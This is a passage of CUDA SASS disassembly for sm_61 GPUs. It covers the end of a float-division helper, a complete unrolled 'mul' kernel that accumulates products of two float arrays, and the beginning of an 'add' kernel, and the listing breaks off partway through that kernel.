/* 0xe2400000330b0002 */
/*0990*/ LOP.AND.NZ P2, RZ, R9, c[0x2][0x4] ; /* 0x4c423008001709ff */
/*0998*/ PSETP.OR.AND P2, PT, !P3, !P2, PT ; /* 0x509003814107b017 */
/* 0x001fb400fda007fd */
/*09a8*/ @P2 BRA 0xcb0 ; /* 0xe24000003002000f */
/*09b0*/ LOP.AND.NZ P2, RZ, R8, c[0x2][0x4] ; /* 0x4c423008001708ff */
/*09b8*/ PSETP.OR.AND P0, PT, !P0, !P2, PT ; /* 0x5090038141078007 */
/* 0x001fb000fe2007fd */
/*09c8*/ @P0 BRA 0xc90 ; /* 0xe24000002c00000f */
/*09d0*/ ISETP.GE.AND P0, PT, R11, RZ, PT ; /* 0x5b6d03800ff70b07 */
/*09d8*/ ISETP.GE.AND P2, PT, R12, RZ, PT ; /* 0x5b6d03800ff70c17 */
/* 0x001f8400fc2007e1 */
/*09e8*/ @P0 MOV R4, RZ ; /* 0x5c9807800ff00004 */
/*09f0*/ @!P0 MOV32I R4, 0xffffffc0 ; /* 0x010ffffffc08f004 */
/*09f8*/ @!P0 FFMA R9, R9, 1.84467440737095516160e+19, RZ ; /* 0x32807fdf80080909 */
/* 0x001ff400fe0007e4 */
/*0a08*/ @!P2 FFMA R8, R8, 1.84467440737095516160e+19, RZ ; /* 0x32807fdf800a0808 */
/*0a10*/ { @!P2 IADD32I R4, R4, 0x40 ; /* 0x1c000000040a0404 */
/*0a18*/ SYNC }
/* 0xf0f800000007000f */
/* 0x001f8800fec007f0 */
/*0a28*/ { ISCADD32I R10, R5, -0x3f800000, 0x17 ; /* 0x16ec08000007050a */
/*0a30*/ PBK 0xc78 }
/* 0xe2a0000024000000 */
/*0a38*/ IADD R12, -R10, R8 ; /* 0x5c12000000870a0c */
/* 0x001ff400fc200714 */
/*0a48*/ MUFU.RCP R10, R12 ; /* 0x5080000000470c0a */
/*0a50*/ FADD.FTZ R8, -R12, -RZ ; /* 0x5c5930000ff70c08 */
/*0a58*/ IADD32I R7, R7, -0x7f ; /* 0x1c0ffffff8170707 */
/* 0x001f9800fca00ff1 */
/*0a68*/ FFMA R13, R10, R8, c[0x2][0x0] ; /* 0x5180040800070a0d */
/*0a70*/ ISCADD R11, -R7, R9, 0x17 ; /* 0x5c1a0b800097070b */
/*0a78*/ FFMA R9, R10, R13, R10 ; /* 0x5980050000d70a09 */
/* 0x001fc400fcc007e6 */
/*0a88*/ FFMA R10, R11, R9, RZ ; /* 0x59807f8000970b0a */
/*0a90*/ FFMA R15, R8, R10, R11 ; /* 0x5980058000a7080f */
/*0a98*/ FFMA R10, R9, R15, R10 ; /* 0x5980050000f7090a */
/* 0x001f9400fc2007e5 */
/*0aa8*/ IADD3 R7, R7, 0x7f, -R5 ; /* 0x38c2028007f70707 */
/*0ab0*/ FFMA R8, R8, R10, R11 ; /* 0x5980058000a70808 */
/*0ab8*/ IADD R7, R7, R4 ; /* 0x5c10000000470707 */
/* 0x001ff400fcc007f6 */
/*0ac8*/ FFMA R5, R9, R8, R10 ; /* 0x5980050000870905 */
/*0ad0*/ BFE.U32 R4, R5, 0x817 ; /* 0x3800000081770504 */
/*0ad8*/ IADD R4, R4, R7 ; /* 0x5c10000000770404 */
/* 0x001ff400fda007f6 */
/*0ae8*/ IADD32I R11, R4, -0x1 ; /* 0x1c0ffffffff7040b */
/*0af0*/ ISETP.GE.U32.AND P0, PT, R11, 0xfe, PT ; /* 0x366c03800fe70b07 */
/*0af8*/ @!P0 BRA 0xc60 ; /* 0xe24000001608000f */
/* 0x001ff400fda007f0 */
/*0b08*/ { ISETP.GT.AND P0, PT, R4, 0xfe, PT ; /* 0x366903800fe70407 */
/*0b10*/ SSY 0xb60 }
/* 0xe290000004800000 */
/*0b18*/ @P0 BRA 0xc40 ; /* 0xe24000001200000f */
/* 0x001fb400ffa007ed */
/*0b28*/ ISETP.GE.AND P0, PT, R4, 0x1, PT ; /* 0x366d038000170407 */
/*0b30*/ @P0 BRK ; /* 0xe34000000000000f */
/*0b38*/ ISETP.GE.AND P0, PT, R4, -0x18, PT ; /* 0x376d03fffe870407 */
/* 0x001ff400ffa007f0 */
/*0b48*/ { LOP32I.AND R5, R5, 0x80000000 ; /* 0x0408000000070505 */
/*0b50*/ @!P0 BRK }
/* 0xe34000000008000f */
/*0b58*/ SYNC ; /* 0xf0f800000007000f */
/* 0x001f8400fca007f1 */
/*0b68*/ FFMA.RZ R7, R9, R8, R10 ; /* 0x5998050000870907 */
/*0b70*/ ISETP.NE.AND P2, PT, R4, RZ, PT ; /* 0x5b6b03800ff70417 */
/*0b78*/ LOP32I.AND R7, R7, 0x7fffff ; /* 0x040007fffff70707 */
/* 0x001f8400fc2007e5 */
/*0b88*/ IADD32I R12, R4, 0x20 ; /* 0x1c0000000207040c */
/*0b90*/ LOP32I.OR R11, R7, 0x800000 ; /* 0x042008000007070b */
/*0b98*/ FFMA.RP R7, R9, R8, R10 ; /* 0x5990050000870907 */
/* 0x001fd000fe4007f4 */
/*0ba8*/ FFMA.RM R8, R9, R8, R10 ; /* 0x5988050000870908 */
/*0bb0*/ SHL R12, R11, R12 ; /* 0x5c48000000c70b0c */
/*0bb8*/ FSETP.NEU.FTZ.AND P0, PT, R7, R8, PT ; /* 0x5bbd838000870707 */
/* 0x001f9800fec007e1 */
/*0bc8*/ ISETP.NE.AND P2, PT, R12, RZ, P2 ; /* 0x5b6b01000ff70c17 */
/*0bd0*/ IADD R7, -R4, RZ ; /* 0x5c1200000ff70407 */
/*0bd8*/ ICMP.NE R4, R7, RZ, R4 ; /* 0x5b4b02000ff70704 */
/* 0x001fd800fec007f1 */
/*0be8*/ PSETP.OR.AND P0, PT, P0, P2, PT ; /* 0x5090038041070007 */
/*0bf0*/ SHR.U32 R4, R11, R4 ; /* 0x5c28000000470b04 */
/*0bf8*/ SHR.U32 R8, R4, 0x1 ; /* 0x3828000000170408 */
/* 0x001f9800fcc007fd */
/*0c08*/ SEL R7, RZ, 0x1, !P0 ; /* 0x38a004000017ff07 */
/*0c10*/ LOP3.LUT R7, R7, 0x1, R8, 0xf8 ; /* 0x3cf8040000170707 */
/*0c18*/ LOP.AND R7, R7, R4 ; /* 0x5c47000000470707 */
/* 0x001ff400fe0007e6 */
/*0c28*/ IADD R7, R8, R7 ; /* 0x5c10000000770807 */
/*0c30*/ { LOP.OR R5, R7, R5 ; /* 0x5c47020000570705 */
/*0c38*/ BRK }
/* 0xe34000000007000f */
/* 0x001ff400fe0007f6 */
/*0c48*/ LOP32I.AND R5, R5, 0x80000000 ; /* 0x0408000000070505 */
/*0c50*/ { LOP32I.OR R5, R5, 0x7f800000 ; /* 0x0427f80000070505 */
/*0c58*/ BRK }
/* 0xe34000000007000f */
/* 0x001fc000ffa007f0 */
/*0c68*/ { ISCADD R5, R7, R5, 0x17 ; /* 0x5c180b8000570705 */
/*0c70*/ BRK }
/* 0xe34000000007000f */
/*0c78*/ { MOV R4, R5 ; /* 0x5c98078000570004 */
/* 0x001fc000fec007ff */
/*0c88*/ RET }
/* 0xe32000000007000f */
/*0c90*/ LOP3.LUT R8, R8, c[0x2][0x8], R9, 0x48 ; /* 0x0248048800270808 */
/*0c98*/ { LOP32I.OR R4, R8, 0x7f800000 ; /* 0x0427f80000070804 */
/* 0x001ffc00fe0007ff */
/*0ca8*/ RET }
/* 0xe32000000007000f */
/*0cb0*/ { LOP3.LUT R4, R8, c[0x2][0x8], R9, 0x48 ; /* 0x0248048800270804 */
/*0cb8*/ RET }
/* 0xe32000000007000f */
/* 0x001fc000ffe007f0 */
/*0cc8*/ { MOV32I R4, 0x7fffffff ; /* 0x0107fffffff7f004 */
/*0cd0*/ RET }
/* 0xe32000000007000f */
/*0cd8*/ { FADD.FTZ R4, R9, R8 ; /* 0x5c58100000870904 */
/* 0x001f8000ffe007ff */
/*0ce8*/ RET }
/* 0xe32000000007000f */
/*0cf0*/ BRA 0xcf0 ; /* 0xe2400fffff87000f */
/*0cf8*/ NOP; /* 0x50b0000000070f00 */
..........................
Function : _Z3mulPKfS0_Pfi
.headerflags @"EF_CUDA_SM61 EF_CUDA_PTX_SM(EF_CUDA_SM61)"
/* 0x001c4400fe0007f6 */
/*0008*/ MOV R1, c[0x0][0x20] ; /* 0x4c98078000870001 */
/*0010*/ { MOV R14, RZ ; /* 0x5c9807800ff7000e */
/*0018*/ S2R R10, SR_CTAID.X }
/* 0xf0c800000257000a */
/* 0x085fd841fe20073f */
/*0028*/ S2R R0, SR_TID.X ; /* 0xf0c8000002170000 */
/*0030*/ XMAD.MRG R3, R10.reuse, c[0x0] [0x8].H1, RZ ; /* 0x4f107f8000270a03 */
/*0038*/ XMAD R0, R10.reuse, c[0x0] [0x8], R0 ; /* 0x4e00000000270a00 */
/* 0x001f9800fea007f1 */
/*0048*/ XMAD.PSL.CBCC R10, R10.H1, R3.H1, R0 ; /* 0x5b30001800370a0a */
/*0050*/ MOV32I R0, 0xffffff00 ; /* 0x010ffffff007f000 */
/*0058*/ MOV R11, R10 ; /* 0x5c98078000a7000b */
/* 0x001f9000fc2207f1 */
/*0068*/ SHL R4, R11.reuse, 0x2 ; /* 0x3848000000270b04 */
/*0070*/ SHR.U32 R6, R11, 0x1e ; /* 0x3828000001e70b06 */
/*0078*/ IADD32I R5, R11, 0x1 ; /* 0x1c00000000170b05 */
/* 0x001f8800fc8007f2 */
/*0088*/ IADD R2.CC, R4, c[0x0][0x140] ; /* 0x4c10800005070402 */
/*0090*/ SHL R30, R5, 0x2 ; /* 0x384800000027051e */
/*0098*/ IADD.X R3, R6, c[0x0][0x144] ; /* 0x4c10080005170603 */
/* 0x001f94001e2007f0 */
/*00a8*/ { IADD R4.CC, R4, c[0x0][0x148] ; /* 0x4c10800005270404 */
/*00b0*/ LDG.E R17, [R2] }
/* 0xeed4200000070211 */
/*00b8*/ SHR.U32 R7, R5, 0x1e ; /* 0x3828000001e70507 */
/* 0x001ec400fe0007e2 */
/*00c8*/ IADD.X R5, R6, c[0x0][0x14c] ; /* 0x4c10080005370605 */
/*00d0*/ { IADD R28.CC, R30, c[0x0][0x140] ; /* 0x4c10800005071e1c */
/*00d8*/ LDG.E R15, [R4] }
/* 0xeed420000007040f */
/* 0x001fc000fc4007e5 */
/*00e8*/ IADD32I R6, R11, 0x2 ; /* 0x1c00000000270b06 */
/*00f0*/ IADD.X R29, R7, c[0x0][0x144] ; /* 0x4c1008000517071d */
/*00f8*/ { IADD R30.CC, R30, c[0x0][0x148] ; /* 0x4c10800005271e1e */
/* 0x001f9040fe2001f1 */
/*0108*/ LDG.E R13, [R28] }
/* 0xeed4200000071c0d */
/*0110*/ SHL R26, R6.reuse, 0x2 ; /* 0x384800000027061a */
/*0118*/ SHR.U32 R8, R6, 0x1e ; /* 0x3828000001e70608 */
/* 0x001f9400fc2007e1 */
/*0128*/ IADD.X R31, R7, c[0x0][0x14c] ; /* 0x4c1008000537071f */
/*0130*/ IADD R24.CC, R26, c[0x0][0x140] ; /* 0x4c10800005071a18 */
/*0138*/ IADD32I R6, R11, 0x3 ; /* 0x1c00000000370b06 */
/* 0x081fc400fe2007e1 */
/*0148*/ IADD.X R25, R8, c[0x0][0x144] ; /* 0x4c10080005170819 */
/*0150*/ IADD R26.CC, R26, c[0x0][0x148] ; /* 0x4c10800005271a1a */
/*0158*/ SHL R22, R6.reuse, 0x2 ; /* 0x3848000000270616 */
/* 0x001fc400fe0007e4 */
/*0168*/ SHR.U32 R7, R6, 0x1e ; /* 0x3828000001e70607 */
/*0170*/ { IADD.X R27, R8, c[0x0][0x14c] ; /* 0x4c1008000537081b */
/*0178*/ LDG.E R8, [R24] }
/* 0xeed4200000071808 */
/* 0x001f8800fca007e1 */
/*0188*/ IADD R20.CC, R22, c[0x0][0x140] ; /* 0x4c10800005071614 */
/*0190*/ IADD32I R6, R11, 0x4 ; /* 0x1c00000000470b06 */
/*0198*/ IADD.X R21, R7, c[0x0][0x144] ; /* 0x4c10080005170715 */
/* 0x081fc400fe2007f0 */
/*01a8*/ { IADD R22.CC, R22, c[0x0][0x148] ; /* 0x4c10800005271616 */
/*01b0*/ LDG.E R5, [R20] }
/* 0xeed4200000071405 */
/*01b8*/ SHL R9, R6.reuse, 0x2 ; /* 0x3848000000270609 */
/* 0x001fc000f68007f0 */
/*01c8*/ { SHR.U32 R12, R6, 0x1e ; /* 0x3828000001e7060c */
/*01d0*/ LDG.E R6, [R30] }
/* 0xeed4200000071e06 */
/*01d8*/ { IADD.X R23, R7, c[0x0][0x14c] ; /* 0x4c10080005370717 */
/* 0x001ed800fe0002b2 */
/*01e8*/ LDG.E R7, [R26] }
/* 0xeed4200000071a07 */
/*01f0*/ { IADD R18.CC, R9, c[0x0][0x148] ; /* 0x4c10800005270912 */
/*01f8*/ LDG.E R4, [R22] }
/* 0xeed4200000071604 */
/* 0x001fc001fcc007e1 */
/*0208*/ IADD.X R19, R12, c[0x0][0x14c] ; /* 0x4c10080005370c13 */
/*0210*/ IADD R2.CC, R9, c[0x0][0x140] ; /* 0x4c10800005070902 */
/*0218*/ { IADD.X R3, R12, c[0x0][0x144] ; /* 0x4c10080005170c03 */
/* 0x000ed800fe0000f2 */
/*0228*/ LDG.E R12, [R18] }
/* 0xeed420000007120c */
/*0230*/ { IADD32I R16, R11, 0x5 ; /* 0x1c00000000570b10 */
/*0238*/ LDG.E R9, [R2] }
/* 0xeed4200000070209 */
/* 0x001ff404fc2217f1 */
/*0248*/ SHL R28, R16.reuse, 0x2 ; /* 0x384800000027101c */
/*0250*/ SHR.U32 R27, R16, 0x1e ; /* 0x3828000001e7101b */
/*0258*/ IADD32I R16, R11, 0x6 ; /* 0x1c00000000670b10 */
/* 0x001f8800fca007f1 */
/*0268*/ IADD R30.CC, R28, c[0x0][0x140] ; /* 0x4c10800005071c1e */
/*0270*/ SHL R26, R16, 0x2 ; /* 0x384800000027101a */
/*0278*/ IADD.X R31, R27, c[0x0][0x144] ; /* 0x4c10080005171b1f */
/* 0x001f8400fe2007f0 */
/*0288*/ { IADD R28.CC, R28, c[0x0][0x148] ; /* 0x4c10800005271c1c */
/*0290*/ LDG.E R30, [R30] }
/* 0xeed4200000071e1e */
/*0298*/ SHR.U32 R16, R16, 0x1e ; /* 0x3828000001e71010 */
/* 0x011fc000fc400fe4 */
/*02a8*/ IADD32I R18, R11, 0x7 ; /* 0x1c00000000770b12 */
/*02b0*/ IADD.X R29, R27, c[0x0][0x14c] ; /* 0x4c10080005371b1d */
/*02b8*/ { IADD R2.CC, R26, c[0x0][0x140] ; /* 0x4c10800005071a02 */
/* 0x001f8800fca007b1 */
/*02c8*/ LDG.E R29, [R28] }
/* 0xeed4200000071c1d */
/*02d0*/ SHL R24, R18, 0x2 ; /* 0x3848000000271218 */
/*02d8*/ IADD.X R3, R16, c[0x0][0x144] ; /* 0x4c10080005171003 */
/* 0x001f84001e2007f0 */
/*02e8*/ { IADD R26.CC, R26, c[0x0][0x148] ; /* 0x4c10800005271a1a */
/*02f0*/ LDG.E R28, [R2] }
/* 0xeed420000007021c */
/*02f8*/ SHR.U32 R18, R18, 0x1e ; /* 0x3828000001e71212 */
/* 0x001fc000fc4007e4 */
/*0308*/ IADD32I R19, R11, 0x8 ; /* 0x1c00000000870b13 */
/*0310*/ IADD.X R27, R16, c[0x0][0x14c] ; /* 0x4c1008000537101b */
/*0318*/ { IADD R16.CC, R24, c[0x0][0x140] ; /* 0x4c10800005071810 */
/* 0x001fcc00fd8007b1 */
/*0328*/ LDG.E R27, [R26] }
/* 0xeed4200000071a1b */
/*0330*/ SHL R22, R19, 0x2 ; /* 0x3848000000271316 */
/*0338*/ DEPBAR.LE SB5, 0x6 ; /* 0xf0f0000034670000 */
/* 0x001fc000fc4007e1 */
/*0348*/ FFMA R15, R15, R17, R14 ; /* 0x5980070001170f0f */
/*0350*/ IADD.X R17, R18, c[0x0][0x144] ; /* 0x4c10080005171211 */
/*0358*/ { IADD R24.CC, R24, c[0x0][0x148] ; /* 0x4c10800005271818 */
/* 0x001f8800fca001f1 */
/*0368*/ LDG.E R26, [R16] }
/* 0xeed420000007101a */
/*0370*/ SHR.U32 R14, R19, 0x1e ; /* 0x3828000001e7130e */
/*0378*/ IADD.X R25, R18, c[0x0][0x14c] ; /* 0x4c10080005371219 */
/* 0x001f8400f6c007f0 */
/*0388*/ { IADD32I R18, R11, 0x9 ; /* 0x1c00000000970b12 */
/*0390*/ LDG.E R25, [R24] }
/* 0xeed4200000071819 */
/*0398*/ SHL R20, R18, 0x2 ; /* 0x3848000000271214 */
/* 0x001f9400fc2007f3 */
/*03a8*/ DEPBAR.LE SB5, 0x5 ; /* 0xf0f0000034570000 */
/*03b0*/ FFMA R13, R6, R13, R15 ; /* 0x5980078000d7060d */
/*03b8*/ IADD R6.CC, R22, c[0x0][0x140] ; /* 0x4c10800005071606 */
/* 0x001fc000fc4007e1 */
/*03c8*/ FFMA R15, R7, R8, R13 ; /* 0x598006800087070f */
/*03d0*/ IADD.X R7, R14, c[0x0][0x144] ; /* 0x4c10080005170e07 */
/*03d8*/ { IADD R22.CC, R22, c[0x0][0x148] ; /* 0x4c10800005271616 */
/* 0x001fcc00fd0002f1 */
/*03e8*/ LDG.E R24, [R6] }
/* 0xeed4200000070618 */
/*03f0*/ SHR.U32 R8, R18, 0x1e ; /* 0x3828000001e71208 */
/*03f8*/ DEPBAR.LE SB5, 0x3 ; /* 0xf0f0000034370000 */
/* 0x001fc000fc4007e1 */
/*0408*/ FFMA R15, R4, R5, R15 ; /* 0x598007800057040f */
/*0410*/ IADD.X R23, R14, c[0x0][0x14c] ; /* 0x4c10080005370e17 */
/*0418*/ { IADD R14.CC, R20, c[0x0][0x140] ; /* 0x4c1080000507140e */
/* 0x001f8c00fc4007b1 */
/*0428*/ LDG.E R23, [R22] }
/* 0xeed4200000071617 */
/*0430*/ IADD32I R13, R11, 0xa ; /* 0x1c00000000a70b0d */
/*0438*/ FFMA R12, R12, R9, R15 ; /* 0x5980078000970c0c */
/* 0x000fc400fe0007e2 */
/*0448*/ IADD.X R15, R8, c[0x0][0x144] ; /* 0x4c1008000517080f */
/*0450*/ { IADD R20.CC, R20, c[0x0][0x148] ; /* 0x4c10800005271414 */
/*0458*/ LDG.E R22, [R14] }
/* 0xeed4200000070e16 */
/* 0x001f8800fc8207f1 */
/*0468*/ SHL R18, R13.reuse, 0x2 ; /* 0x3848000000270d12 */
/*0470*/ SHR.U32 R13, R13, 0x1e ; /* 0x3828000001e70d0d */
/*0478*/ IADD.X R21, R8, c[0x0][0x14c] ; /* 0x4c10080005370815 */
/* 0x001f9400f62007f0 */
/*0488*/ { IADD R4.CC, R18, c[0x0][0x140] ; /* 0x4c10800005071204 */
/*0490*/ LDG.E R21, [R20] }
/* 0xeed4200000071415 */
/*0498*/ IADD32I R9, R11, 0xb ; /* 0x1c00000000b70b09 */
/* 0x0013c400fe0007e2 */
/*04a8*/ IADD.X R5, R13, c[0x0][0x144] ; /* 0x4c10080005170d05 */
/*04b0*/ { IADD R18.CC, R18, c[0x0][0x148] ; /* 0x4c10800005271212 */
/*04b8*/ LDG.E R20, [R4] }
/* 0xeed4200000070414 */
/* 0x001f8800fc8207f1 */
/*04c8*/ SHL R8, R9.reuse, 0x2 ; /* 0x3848000000270908 */
/*04d0*/ SHR.U32 R9, R9, 0x1e ; /* 0x3828000001e70909 */
/*04d8*/ IADD.X R19, R13, c[0x0][0x14c] ; /* 0x4c10080005370d13 */
/* 0x001f9400f6200ff0 */
/*04e8*/ { IADD R2.CC, R8, c[0x0][0x140] ; /* 0x4c10800005070802 */
/*04f0*/ LDG.E R19, [R18] }
/* 0xeed4200000071213 */
/*04f8*/ IADD32I R13, R11, 0xc ; /* 0x1c00000000c70b0d */
/* 0x0003c402fe0007e2 */
/*0508*/ IADD.X R3, R9, c[0x0][0x144] ; /* 0x4c10080005170903 */
/*0510*/ { IADD R16.CC, R8, c[0x0][0x148] ; /* 0x4c10800005270810 */
/*0518*/ LDG.E R18, [R2] }
/* 0xeed4200000070212 */
/* 0x001f8800fc8207f1 */
/*0528*/ SHL R8, R13.reuse, 0x2 ; /* 0x3848000000270d08 */
/*0530*/ SHR.U32 R13, R13, 0x1e ; /* 0x3828000001e70d0d */
/*0538*/ IADD.X R17, R9, c[0x0][0x14c] ; /* 0x4c10080005370911 */
/* 0x001f9400f62027f0 */
/*0548*/ { IADD R6.CC, R8, c[0x0][0x140] ; /* 0x4c10800005070806 */
/*0550*/ LDG.E R17, [R16] }
/* 0xeed4200000071011 */
/*0558*/ IADD32I R9, R11, 0xd ; /* 0x1c00000000d70b09 */
/* 0x0007c408fe0007e2 */
/*0568*/ IADD.X R7, R13, c[0x0][0x144] ; /* 0x4c10080005170d07 */
/*0570*/ { IADD R14.CC, R8, c[0x0][0x148] ; /* 0x4c1080000527080e */
/*0578*/ LDG.E R16, [R6] }
/* 0xeed4200000070610 */
/* 0x001f8800fc8207f1 */
/*0588*/ SHL R8, R9.reuse, 0x2 ; /* 0x3848000000270908 */
/*0590*/ SHR.U32 R9, R9, 0x1e ; /* 0x3828000001e70909 */
/*0598*/ IADD.X R15, R13, c[0x0][0x14c] ; /* 0x4c10080005370d0f */
/* 0x001f9400f62087f0 */
/*05a8*/ { IADD R4.CC, R8, c[0x0][0x148] ; /* 0x4c10800005270804 */
/*05b0*/ LDG.E R15, [R14] }
/* 0xeed4200000070e0f */
/*05b8*/ IADD32I R13, R11, 0xe ; /* 0x1c00000000e70b0d */
/* 0x083fc400fe2007e1 */
/*05c8*/ IADD.X R5, R9, c[0x0][0x14c] ; /* 0x4c10080005370905 */
/*05d0*/ IADD R8.CC, R8, c[0x0][0x140] ; /* 0x4c10800005070808 */
/*05d8*/ SHL R2, R13.reuse, 0x2 ; /* 0x3848000000270d02 */
/* 0x001f88001e8007f0 */
/*05e8*/ { SHR.U32 R3, R13, 0x1e ; /* 0x3828000001e70d03 */
/*05f0*/ LDG.E R13, [R4] }
/* 0xeed420000007040d */
/*05f8*/ IADD.X R9, R9, c[0x0][0x144] ; /* 0x4c10080005170909 */
/* 0x003f9400362017f0 */
/*0608*/ { IADD R6.CC, R2, c[0x0][0x148] ; /* 0x4c10800005270206 */
/*0610*/ LDG.E R14, [R8] }
/* 0xeed420000007080e */
/*0618*/ IADD32I R4, R11, 0xf ; /* 0x1c00000000f70b04 */
/* 0x001fc400fe0007e2 */
/*0628*/ IADD.X R7, R3, c[0x0][0x14c] ; /* 0x4c10080005370307 */
/*0630*/ { IADD R2.CC, R2, c[0x0][0x140] ; /* 0x4c10800005070202 */
/*0638*/ LDG.E R6, [R6] }
/* 0xeed4200000070606 */
/* 0x001f8800fc8217f1 */
/*0648*/ SHL R8, R4.reuse, 0x2 ; /* 0x3848000000270408 */
/*0650*/ SHR.U32 R31, R4, 0x1e ; /* 0x3828000001e7041f */
/*0658*/ IADD.X R3, R3, c[0x0][0x144] ; /* 0x4c10080005170303 */
/* 0x001f8800f6c007f0 */
/*0668*/ { IADD R4.CC, R8, c[0x0][0x148] ; /* 0x4c10800005270804 */
/*0670*/ LDG.E R3, [R2] }
/* 0xeed4200000070203 */
/*0678*/ IADD.X R5, R31, c[0x0][0x14c] ; /* 0x4c10080005371f05 */
/* 0x001f8800fec007f0 */
/*0688*/ { IADD R8.CC, R8, c[0x0][0x140] ; /* 0x4c10800005070808 */
/*0690*/ LDG.E R4, [R4] }
/* 0xeed4200000070404 */
/*0698*/ IADD.X R9, R31, c[0x0][0x144] ; /* 0x4c10080005171f09 */
/* 0x001f9800fe6007b5 */
/*06a8*/ LDG.E R9, [R8] ; /* 0xeed4200000070809 */
/*06b0*/ DEPBAR.LE SB5, 0x9 ; /* 0xf0f0000034970000 */
/*06b8*/ FFMA R29, R29, R30, R12 ; /* 0x5980060001e71d1d */
/* 0x001f8400fec007e1 */
/*06c8*/ FFMA R27, R27, R28, R29 ; /* 0x59800e8001c71b1b */
/*06d0*/ IADD32I R0, R0, 0x10 ; /* 0x1c00000001070000 */
/*06d8*/ ISETP.NE.AND P0, PT, R0, RZ, PT ; /* 0x5b6b03800ff70007 */
/* 0x001f8400fe6007ec */
/*06e8*/ IADD32I R11, R11, 0x10 ; /* 0x1c00000001070b0b */
/*06f0*/ DEPBAR.LE SB5, 0x8 ; /* 0xf0f0000034870000 */
/*06f8*/ FFMA R25, R25, R26, R27 ; /* 0x59800d8001a71919 */
/* 0x001fd400fc2007f5 */
/*0708*/ DEPBAR.LE SB5, 0x7 ; /* 0xf0f0000034770000 */
/*0710*/ FFMA R23, R23, R24, R25 ; /* 0x59800c8001871717 */
/*0718*/ DEPBAR.LE SB5, 0x6 ; /* 0xf0f0000034670000 */
/* 0x001f8400fea007e1 */
/*0728*/ FFMA R21, R21, R22, R23 ; /* 0x59800b8001671515 */
/*0730*/ DEPBAR.LE SB5, 0x5 ; /* 0xf0f0000034570000 */
/*0738*/ FFMA R19, R19, R20, R21 ; /* 0x59800a8001471313 */
/* 0x001fd400fc2007f5 */
/*0748*/ DEPBAR.LE SB5, 0x4 ; /* 0xf0f0000034470000 */
/*0750*/ FFMA R17, R17, R18, R19 ; /* 0x5980098001271111 */
/*0758*/ DEPBAR.LE SB5, 0x3 ; /* 0xf0f0000034370000 */
/* 0x001f8400fea007e1 */
/*0768*/ FFMA R15, R15, R16, R17 ; /* 0x5980088001070f0f */
/*0770*/ DEPBAR.LE SB5, 0x2 ; /* 0xf0f0000034270000 */
/*0778*/ FFMA R13, R13, R14, R15 ; /* 0x5980078000e70d0d */
/* 0x041fc000fcc007f5 */
/*0788*/ DEPBAR.LE SB5, 0x1 ; /* 0xf0f0000034170000 */
/*0790*/ FFMA R3, R6, R3, R13 ; /* 0x5980068000370603 */
/*0798*/ { FFMA R14, R4, R9, R3 ; /* 0x598001800097040e */
/* 0x001f9840fe2007fd */
/*07a8*/ @P0 BRA 0x60 }
/* 0xe2400fff8b00000f */
/*07b0*/ SHR R0, R10.reuse, 0x1e ; /* 0x3829000001e70a00 */
/*07b8*/ ISCADD R4.CC, R10, c[0x0][0x150], 0x2 ; /* 0x4c18810005470a04 */
/* 0x001ffc00fea007e2 */
/*07c8*/ IADD.X R5, R0, c[0x0][0x154] ; /* 0x4c10080005570005 */
/*07d0*/ STG.E [R4], R14 ; /* 0xeedc20000007040e */
/*07d8*/ EXIT ; /* 0xe30000000007000f */
/* 0x001f8000fc0007ff */
/*07e8*/ BRA 0x7e0 ; /* 0xe2400fffff07000f */
/*07f0*/ NOP; /* 0x50b0000000070f00 */
/*07f8*/ NOP; /* 0x50b0000000070f00 */
..........................
Function : _Z3addPKfS0_Pfi
.headerflags @"EF_CUDA_SM61 EF_CUDA_PTX_SM(EF_CUDA_SM61)"
/* 0x001c4400fe0007f6 */
/*0008*/ MOV R1, c[0x0][0x20] ; /* 0x4c98078000870001 */
/*0010*/ { MOV R8, RZ ; /* 0x5c9807800ff70008 */
/*0018*/ S2R R0, SR_CTAID.X }
/* 0xf0c8000002570000 */
/* 0x083fc400e7e007f0 */
/*0028*/ { MOV32I R30, 0xffffff00 ; /* 0x010ffffff007f01e */
/*0030*/ S2R R2, SR_TID.X }
/* 0xf0c8000002170002 */
/*0038*/ XMAD.MRG R3, R0.reuse, c[0x0] [0x8].H1, RZ ; /* 0x4f107f8000270003 */
/* 0x001fd800fec217f6 */
/*0048*/ XMAD R2, R0.reuse, c[0x0] [0x8], R2 ; /* 0x4e00010000270002 */
/*0050*/ XMAD.PSL.CBCC R0, R0.H1, R3.H1, R2 ; /* 0x5b30011800370000 */
/*0058*/ MOV R11, R0 ; /* 0x5c9807800007000b */
/* 0x001fd040fe2207f1 */
/*0068*/ SHL R6, R11.reuse, 0x2 ; /* 0x3848000000270b06 */
/*0070*/ IADD32I R4, R11.reuse, 0x1 ; /* 0x1c00000000170b04 */
/*0078*/ SHR.U32 R7, R11, 0x1e ; /* 0x3828000001e70b07 */
/* 0x001f8440fe2007f1 */
/*0088*/ IADD R2.CC, R6, c[0x0][0x140] ; /* 0x4c10800005070602 */
/*0090*/ SHL R26, R4.reuse, 0x2 ; /* 0x384800000027041a */
/*0098*/ SHR.U32 R5, R4, 0x1e ; /* 0x3828000001e70405 */
/* 0x001fc000fe4207f3 */
/*00a8*/ IADD32I R4, R11.reuse, 0x2 ; /* 0x1c00000000270b04 */
/*00b0*/ IADD.X R3, R7, c[0x0][0x144] ; /* 0x4c10080005170703 */
/*00b8*/ { IADD R6.CC, R6, c[0x0][0x148] ; /* 0x4c10800005270606 */
/* 0x001fc440fe2007f1 */
/*00c8*/ LDG.E R21, [R2] }
/* 0xeed4200000070215 */
/*00d0*/ SHL R24, R4.reuse, 0x2 ; /* 0x3848000000270418 */
/*00d8*/ SHR.U32 R9, R4, 0x1e ; /* 0x3828000001e70409 */
/* 0x081fc000fe4007e3 */
/*00e8*/ IADD32I R4, R11, 0x3 ; /* 0x1c00000000370b04 */
/*00f0*/ IADD.X R7, R7, c[0x0][0x14c] ; /* 0x4c10080005370707 */
/*00f8*/ { IADD R16.CC, R26.reuse, c[0x0][0x140] ; /* 0x4c10800005071a10 */
/* 0x081fc800fea000b1 */
/*0108*/ LDG.E R20, [R6] }
/* 0xeed4200000070614 */
/*0110*/ SHL R12, R4, 0x2 ; /* 0x384800000027040c */
/*0118*/ IADD.X R17, R5.reuse, c[0x0][0x144] ; /* 0x4c10080005170511 */
/* 0x001f8800fec007f0 */
/*0128*/ { IADD R26.CC, R26, c[0x0][0x148] ; /* 0x4c10800005271a1a */
/*0130*/ LDG.E R17, [R16] }
/* 0xeed4200000071011 */
/*0138*/ IADD.X R27, R5, c[0x0][0x14c] ; /* 0x4c1008000537051b */
/* 0x001fd400362207f0 */
